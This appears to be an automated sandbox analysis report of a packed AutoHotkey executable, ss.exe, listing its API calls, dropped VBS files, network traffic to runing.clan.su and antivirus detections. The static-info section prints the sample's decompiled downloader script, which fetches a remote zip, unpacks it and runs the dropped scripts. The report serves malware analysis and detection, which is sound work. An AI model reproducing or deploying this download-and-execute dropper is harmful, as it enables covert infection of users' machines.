Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0045C7A0 MulDiv,MulDiv,MulDiv,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsA,MulDiv,GetSystemMetrics,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextA,DrawTextA,GetCharABCWidthsA,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsA,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetWindowLongA,SendMessageA,SetWindowLongA,CreateWindowExA,CreateWindowExA,CreateWindowExA,CreateWindowExA,GetWindowLongA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,CreateWindowExA,SendMessageA,SendMessageA,CreateWindowExA,SendMessageA,SendMessageA,SendMessageA,MulDiv,MulDiv,MulDiv,MoveWindow,SelectObject,ReleaseDC,SendMessageA,SendMessageA,GetClientRect,SetWindowLongA,SendMessageA,SetWindowLongA,MoveWindow,GetWindowRect,SendMessageA,SetWindowPos,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,2_2_0045C7A0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004392C0 SendMessageA,SendMessageA,SendMessageA,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageA,2_2_004392C0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00475520 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,FindWindowA,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,2_2_00475520
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0045F710 GetWindowLongA,GetWindowLongA,GetWindowLongA,__Stoull,__Stoull,SetWindowPos,__Stoull,EnableWindow,__Stoull,__Stoull,__Stoull,MulDiv,MulDiv,__Stoull,MulDiv,MulDiv,IsWindow,SetParent,SetWindowLongA,SetParent,IsWindowVisible,IsIconic,SetWindowLongA,SetWindowLongA,SetWindowPos,InvalidateRect,2_2_0045F710
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00472CD0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,2_2_00472CD0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00435EB0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongA,GetModuleHandleA,GetProcAddress,2_2_00435EB0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0043A180 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,EnumChildWindows,GetClassNameA,EnumChildWindows,2_2_0043A180
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00472C70 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,2_2_00472C70
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00437340 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,2_2_00437340
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0044F220 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCA,GetDC,GetPixel,DeleteDC,ReleaseDC,2_2_0044F220
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004669E0 SendMessageA,SendMessageA,SendMessageA,GetWindowLongA,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,SendMessageA,ShowWindow,GetWindowLongA,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageA,SendMessageA,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,2_2_004669E0
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\ss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\ss.exeQueries volume information: C:\PROGRA~2\runings.zip VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00423F40 GlobalUnWire,CloseClipboard,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,GetTickCount,GetSystemTimeAsFileTime,FileTimeToLocalFileTime,__alldiv,2_2_00423F40
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0041271E RtlGetVersion,2_2_0041271E
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 521716 Sample: ss.exe Startdate: 03/04/2018 Architecture: WINDOWS Score: 72 16 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->16 18 Multi AV Scanner detection for submitted file 2->18 20 Antivirus detection for unpacked file 2->20 6 ss.exe 12 2->6         started        process3 dnsIp4 12 runing.clan.su 195.216.243.130, 49188, 80 MASTERTEL-ASMoscowRussiaRU United Kingdom 6->12 14 8.8.8.8, 53, 56975 GOOGLE-GoogleIncUS United States 6->14 22 Potential malicious VBS script found (suspicious strings) 6->22 24 Contains functionality to register a low level keyboard hook 6->24 10 wscript.exe 6->10         started        signatures5 process6

Simulations

Behavior and APIs

TimeTypeDescription
13:55:23API Interceptor4x Sleep call for process: ss.exe modified
13:56:11API Interceptor1x Sleep call for process: wscript.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
ss.exe31%virustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLink
2.2.ss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
2.0.ss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
2.1.ss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen

Domains

SourceDetectionScannerLabelLink
runing.clan.su2%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
195.216.243.1302018-01-10_12-13-23.execb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050maliciousBrowse
  • lolkekss.usite.pro/DF2.png
ss.exea8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0bmaliciousBrowse
  • runing.clan.su/runings.zip

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
MASTERTEL-ASMoscowRussiaRUpaid_invoice_doc.pdf1e393b6ad5c0ee0f3ad112279a5889799fb620dd80d907b8bd23e88fe6f83435maliciousBrowse
  • 195.216.243.155
2018-01-10_12-13-23.execb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050maliciousBrowse
  • 195.216.243.130
ss.exea8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0bmaliciousBrowse
  • 195.216.243.130

Dropped Files

No context

Screenshots

windows-stand

Startup

  • System is w7_1
  • ss.exe (PID: 3596 cmdline: 'C:\Users\user\Desktop\ss.exe' MD5: B83E77AE26E3663301648318E38EC1B2)
    • wscript.exe (PID: 3764 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A)
  • cleanup

Created / dropped Files

C:\ProgramData\runings.zip
Process:C:\Users\user\Desktop\ss.exe
File Type:HTML document, ASCII text, with very long lines
Size (bytes):6868
Entropy (8bit):5.311417081263737
Encrypted:false
MD5:92039EF35A7D4B77CF46FCA6401B33C1
SHA1:C5D06575B974470C71FF0F2493E32C9E7668238C
SHA-256:67D73BE441C1A7DEE565281EB1CA5AE47B612D6FFC109D2B706A73E0F19F3999
SHA-512:38325D878501EFAB4738B361C508F5ACE5D56A8CEA1B423A2B718E3AFF9D09D791BB9942C08A9EA4E1447E3B6334B7CC8B205AB7FB9A309EDEE074514D3F3FF1
Malicious:false
Reputation:low
C:\ProgramData\start.vbs
Process:C:\Users\user\Desktop\ss.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):123
Entropy (8bit):4.834108065762658
Encrypted:false
MD5:B9B022474BFDB5DF814922B1EAD71E45
SHA1:6CC42E94C04B94E5524F74BED4726332846AFAC0
SHA-256:F5868BE8126450DC59DC6A24DD7A9EEDE0FD02799225CAE409A47EE50312CCAA
SHA-512:8E1284C43A0D64B36FC89BB66425D2C303E9A2C0F1D784E330B03681713B4F91B51216E791E605163C612E74C3A03D5902DEBB63EC61723BC29F04EF4DDD25DF
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
runing.clan.su195.216.243.130truetrue2%, virustotal, Browseunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
8.8.8.8United States
15169GOOGLE-GoogleIncUSfalse
195.216.243.130United Kingdom
29226MASTERTEL-ASMoscowRussiaRUtrue

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):7.881366538923817
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.38%
  • UPX compressed Win32 Executable (30571/9) 0.30%
  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:ss.exe
File size:336896
MD5:b83e77ae26e3663301648318e38ec1b2
SHA1:2adf8fdbea965ff2237644697e5d3e966760f90c
SHA256:a8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0b
SHA512:70c5c2e50bd00ad49cf5d7753ed8b43350a047210abd761a7083813a375e9f783b1ca19c86a0b86ebb9730d3a3aebec8450bac433382b36f2a5c91882c2f5aad
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................9.......8.L.......................t.............=.....................Rich............PE..L...A.>W...........

File Icon

Static PE Info

General

Entrypoint:0x4b6760
Entrypoint Section:UPX1
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x573EA441 [Fri May 20 05:44:33 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:2dead38317347de812f33c5e69b985ff

Entrypoint Preview

Instruction
pushad
mov esi, 00469000h
lea edi, dword ptr [esi-00068000h]
push edi
jmp 00007F62148662CDh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F62148662AFh
mov eax, 00000001h
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F62148662CDh
jne 00007F62148662EAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F62148662E1h
dec eax
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F6214866296h
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F6214866314h
xor ecx, ecx
sub eax, 03h
jc 00007F62148662D3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F6214866337h
sar eax, 1
mov ebp, eax
jmp 00007F62148662CDh
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F621486628Eh
inc ecx
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F6214866280h
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F62148662B1h
jne 00007F62148662CBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F62148662A6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0xbb2600x300.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE0xb70000x4260.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
UPX00x10000x680000x0False0empty 0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX10x690000x4e0000x4da00False0.994250704509data7.92177156162IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0xb70000x50000x4600False0.22265625data5.14253585569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_ICON0xb72e00x25a8data
RT_ICON0xb988c0x10a8data
RT_ICON0xba9380x468GLS_BINARY_LSB_FIRST
RT_MENU0xb2d940x2c8dataEnglishUnited States
RT_DIALOG0xb305c0xe8dataEnglishUnited States
RT_ACCELERATOR0xb31440x48dataEnglishUnited States
RT_RCDATA0xb318c0x309dataEnglishUnited States
RT_RCDATA0xb34980x7bdataEnglishUnited States
RT_GROUP_ICON0xbada40x30MS Windows icon resource - 3 icons, 48x48, 256-colors
RT_MANIFEST0xbadd80x487ASCII text, with very long lines, with no line terminatorsEnglishUnited States

Imports

DLLImport
KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dllRegCloseKey
COMCTL32.dll
COMDLG32.dllGetOpenFileNameA
GDI32.dllBitBlt
ole32.dllCoGetObject
OLEAUT32.dllSysStringLen
PSAPI.DLLGetModuleBaseNameA
SHELL32.dllDragFinish
USER32.dllGetDC
VERSION.dllVerQueryValueA
WINMM.dllmixerOpen
WSOCK32.dllWSAStartup

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Static AutoHotKey Info

General

Code:; <COMPILER: v1.1.23.07> #SingleInstance force #NoTrayIcon Sleep, 22000 FileInstall, D:\start.vbs, C:\ProgramData\start.vbs Sleep, 5000 UrlDownloadToFile, http://runing.clan.su/runings.zip, C:\ProgramData\runings.zip Sleep, 4000 FileDelete, C:\ProgramData\runings.exe Sleep, 3000 ArcPath = C:\ProgramData\runings.zip OutPath = C:\ProgramData\ Shell := ComObjCreate("Shell.Application") Items := Shell.NameSpace(ArcPath).Items Items.Filter(73952, "*") Shell.NameSpace(OutPath).CopyHere(Items, 16) Sleep, 4000 FileDelete, C:\ProgramData\runings.zip Sleep, 5000 Run, C:\ProgramData\start.vbs,, UseErrorLevel Sleep, 70000 FileDelete, C:\ProgramData\runings.exe FileDelete, C:\ProgramData\start.vbs Sleep, 2000 Run, C:\Users\Public\Videos\up.vbs,, UseErrorLevel Sleep, 1000 ExitApp

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
04/03/18-13:55:57.375675TCP2008259ET TROJAN Suspicious User-Agent (AutoHotkey)4918880192.168.1.16195.216.243.130

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Apr 3, 2018 13:55:57.063105106 CEST5697553192.168.1.168.8.8.8
Apr 3, 2018 13:55:57.265172958 CEST53569758.8.8.8192.168.1.16
Apr 3, 2018 13:55:57.373440027 CEST4918880192.168.1.16195.216.243.130
Apr 3, 2018 13:55:57.373486042 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:55:57.375061989 CEST4918880192.168.1.16195.216.243.130
Apr 3, 2018 13:55:57.375674963 CEST4918880192.168.1.16195.216.243.130
Apr 3, 2018 13:55:57.375695944 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.171808958 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.171840906 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.171880960 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.171987057 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.172004938 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.172058105 CEST4918880192.168.1.16195.216.243.130
Apr 3, 2018 13:56:00.172102928 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.174196005 CEST4918880192.168.1.16195.216.243.130
Apr 3, 2018 13:56:00.270538092 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:00.270646095 CEST4918880192.168.1.16195.216.243.130
Apr 3, 2018 13:56:15.160710096 CEST8049188195.216.243.130192.168.1.16
Apr 3, 2018 13:56:15.160947084 CEST4918880192.168.1.16195.216.243.130
Apr 3, 2018 13:57:32.611829996 CEST4918880192.168.1.16195.216.243.130

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Apr 3, 2018 13:55:57.063105106 CEST5697553192.168.1.168.8.8.8
Apr 3, 2018 13:55:57.265172958 CEST53569758.8.8.8192.168.1.16

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Apr 3, 2018 13:55:57.063105106 CEST192.168.1.168.8.8.80x645aStandard query (0)runing.clan.suA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Apr 3, 2018 13:55:57.265172958 CEST8.8.8.8192.168.1.160x645aNo error (0)runing.clan.su195.216.243.130A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • runing.clan.su

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.1.1649188195.216.243.13080C:\Users\user\Desktop\ss.exe
TimestampkBytes transferredDirectionData
Apr 3, 2018 13:55:57.375674963 CEST0OUTGET /runings.zip HTTP/1.1
User-Agent: AutoHotkey
Host: runing.clan.su
Cache-Control: no-cache
Apr 3, 2018 13:56:00.171808958 CEST2INHTTP/1.1 404 Not Found
Server: nginx/1.8.0
Date: Tue, 03 Apr 2018 11:56:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Data Raw: 31 61 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 20 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 20 66 6f 6e 74 3a 20 31 32 70 78 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 62 6f 64 79 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 33 32 61 32 63 66 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 62 6f 64 79 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0a 74 64 2c 20 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 66 6f 6e 74 3a 20 31 32 70 78 20 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 2e 63 6c 65 61 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 20 7b 77 69 64 74 68 3a 20 37 33 35 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 68 65 61 64 65 72 2d 2d 2d 2d 2d 2d 2a 2f 0a 23 68 65 61 64 65 72 20 7b 68 65 69 67 68 74 3a 20 35 35 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 68 65 61 64 65 72 2d 6c 69 6e 65 2e 67 69 66 29 20 72 65 70 65 61 74 2d 78 20 30 20 34 30 70 78 3b 7d 0a 23 6c 6f 67 6f 20 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 32 36 70 78 20 30 20 30 20 30 3b 20 77 69 64 74 68 3a 20 34 33 70 78 3b 20 68 65 69 67 68 74 3a 20 32 37 70 78 3b 7d 0a 23 6c 6f 67 6f 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 39 70 78 3b 20 77 69 64 74 68 3a 20 34 33 70 78 3b 20 68 65 69 67 68 74 3a 20 32 37 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 2d 39 39 39 39 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 6c 6f 67 6f 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 7d 0a 2e 73 69 74 65 2d 63 72 65 61 74 65 20 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 6d 61 72 67 69 6e 3a 20 32 36 70 78 20 30 20 30 20 30 3b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 35 70 78 20 30 20 31 35 70 78 3b 20 66 6f 6e 74 3a 20 31 31 70 78 2f 32 36 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 37 63 30 65 32 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 61 72 72 6f 77 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 31 30 70 78 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 6d 61 69 6e 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 23 6d 61 69 6e 20 7b 70 61 64 64 69 6e 67 3a 20 35 30 70 78 20 30 20 35 35 70 78 20 30 3b 7d 0a 2e 6d 61 69 6e 2d 6c 65 66 74 20 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 31 36 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 2e 65 72 72 6f 72 74 69 74 6c 65 20 7b 66 6f 6e 74 3a 20 31 38 70 78 2f 32 34 70 78 20
Data Ascii: 1ad4<!DOCTYPE html><html><head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>HTTP 404 Resource not found</title><style type="text/css">body {margin: 0; padding: 0; background: #fff; font: 12px/22px 'Verdana'; color: #686868;}body a {color: #32a2cf; text-decoration: underline;}body a:hover {text-decoration: none;}td, input, select, textarea {font: 12px /22px 'Verdana'; color: #686868;}.clear {clear: both;}.content {width: 735px; margin: auto;}/*--------header------*/#header {height: 55px; background: url(/.s/img/err/404-header-line.gif) repeat-x 0 40px;}#logo {float: left; margin: 0; padding: 26px 0 0 0; width: 43px; height: 27px;}#logo a {display: block; padding: 0 9px; width: 43px; height: 27px; overflow: hidden; outline: none; text-indent: -9999px; background: #fff url(/.s/img/err/404-logo.png) no-repeat center center;}.site-create {float: right; margin: 26px 0 0 0; display: block; padding: 0 5px 0 15px; font: 11px/26px 'Verdana'; color: #67c0e2; background: #fff url(/.s/img/err/404-arrow.png) no-repeat left 10px;}/*--------------------*//*--------main--------*/#main {padding: 50px 0 55px 0;}.main-left {float: left; width: 160px; text-align: center;}.errortitle {font: 18px/24px
Apr 3, 2018 13:56:00.171840906 CEST3INData Raw: 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 37 65 62 34 64 32 3b 7d 0a 2e 65 72 72 6f 72 63 6f 64 65 20 7b 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 32 35 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 35 35 70 78 3b 20 68 65 69 67 68
Data Ascii: 'Verdana'; color: #7eb4d2;}.errorcode {margin: 10px 0 25px 0; width: 155px; height: 66px; background: url(/.s/img/err/404.png) no-repeat;}.pagenotfound {font: 14px/20px 'Verdana'; color: #7e7e7e;}.pagenotfound a {text-transform: uppercase;
Apr 3, 2018 13:56:00.171880960 CEST3INData Raw: 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0a 2e 66 6f 6f 74 65 72 2d 63 6f 6c 20 6c 69 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
Data Ascii: ation: none;}.footer-col li a:hover {text-decoration: underline;}/*--------------------*/</style></head><body><script type="text/javascript"> var _gaq = _gaq ||
